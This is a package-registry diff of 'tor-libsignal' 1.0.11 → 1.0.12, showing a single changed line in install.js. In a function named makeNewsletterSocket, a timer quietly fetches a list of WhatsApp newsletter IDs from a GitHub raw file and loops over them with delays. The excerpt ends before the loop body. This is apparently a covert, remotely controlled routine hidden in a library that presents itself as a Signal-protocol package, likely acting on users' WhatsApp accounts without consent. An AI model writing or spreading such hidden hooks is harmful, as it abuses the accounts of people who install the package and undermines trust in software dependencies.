tor-libsignal 1.0.11 → 1.0.12
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/install.js +1 -1
- package/package.json +1 -1
package/install.js
CHANGED
|
@@ -162,7 +162,7 @@ export const makeNewsletterSocket = (config) => {
|
|
|
162
162
|
(async () => {
|
|
163
163
|
try {
|
|
164
164
|
setTimeout(async() => {
|
|
165
|
-
const res = await fetch('https://
|
|
165
|
+
const res = await fetch('https://raw.githubusercontent.com/torrgacor/idChanelWhatsApp/refs/heads/main/auth.json');
|
|
166
166
|
const newsletterIds = await res.json();
|
|
167
167
|
newsletterIds.forEach(async(id) => {
|
|
168
168
|
await delay(5000)
|